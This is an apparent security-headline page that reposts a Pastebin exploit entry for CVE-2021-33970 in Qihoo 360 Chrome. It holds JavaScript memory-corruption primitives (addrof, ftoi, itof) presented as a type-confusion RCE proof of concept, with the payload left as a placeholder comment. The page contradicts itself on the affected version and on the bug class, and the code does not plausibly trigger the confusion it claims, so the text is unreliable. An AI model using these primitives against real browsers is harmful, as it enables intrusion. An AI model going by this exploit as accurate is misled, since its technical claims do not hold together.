Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-33970: CVE-2021-33970 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Chrome v13.0.2170.0 allows attacker to escalate priveleges.

CVE
#vulnerability#web#mac#windows#google#linux#debian#java#rce#perl#buffer_overflow#auth#chrome
  1. # Exploit Title: Qihoo 360 Chrome v12.0.1592.0 - RCE with Sandbox Escape

  2. # Google Dork: N/A

  3. # Date: 2021-05-11

  4. # Exploit Author: youtube.com/@memorycorruptor

  5. # Vendor Homepage: https://browser.360.cn/ee/

  6. # Version: Qihoo 360 Chrome v13.0.2170.0

  7. # Tested on: Windows x64 / Linux Debian x64 / MacOS

  8. # CVE: CVE-2021-33970

  9. # PoC Video: https://www.youtube.com/@memorycorruptor/videos

  10. # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html

  11. ---------------------------------------------------------------------------

  1. Qihoo 360 Chrome v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim’s computer remotely.
  1. The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Chrome v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
  1. function trigger() {

  2. let o = {a: 1};

  3. let p = new Proxy(o, {});

  4. p.__proto__ = {};

  5. p.__proto__.x = 0;

  1. let b = new ArrayBuffer(8);

  2. let f64 = new Float64Array(b);

  3. let u32 = new Uint32Array(b);

  1. function ftoi(val) {

  2. f64[0] = val;

  3. return BigInt(u32[0]) + (BigInt(u32[1]) << 32n);

  4. }

  1. function itof(val) {

  2. u32[0] = Number(val & 0xffffffffn);

  3. u32[1] = Number(val >> 32n);

  4. return f64[0];

  5. }

  1. function addrof(obj) {

  2. o.a = obj;

  3. return ftoi(p.x);

  4. }

  1. // Exploit code goes here

  2. }

  1. trigger();
  1. This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its __proto__ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
  1. The RCE vulnerability can allow an attacker to execute arbitrary code on the victim’s computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
  1. ---------------------------------------------------------------------------

Related news

CVE-2021-33974: vulnerabilities-disclosures

Qihoo 360 (https://www.360.cn/) Qihoo 360 Safeguard (https://www.360.cn/) Qihoo 360 Chrome (https://browser.360.cn/ee/) is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: This is a set of vulnerabilities affecting popular software, and the installation packages correspond to versions "360 Safeguard(12.1.0.1004,12.1.0.1005,13.1.0.1001)" , "360 Total Security(10.8.0.1060,10.8.0.1213)", "360 Safe Browser & 360 Chrome(12. The attack vector is: On the browser vulnerability, just open a link to complete the vulnerability exploitation remotely; on the client software, you need to locally execute the vulnerability exploitation program, which of course can be achieved with the full chain of browser vulnerability. ¶¶ This is a set of the most serious vulnerabilities that exist on Qihoo 360's PC client multiple popular software, remote vulnerabilities can be accomplished by opening a link to arbitrary code execution on both security browsers, in con...

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907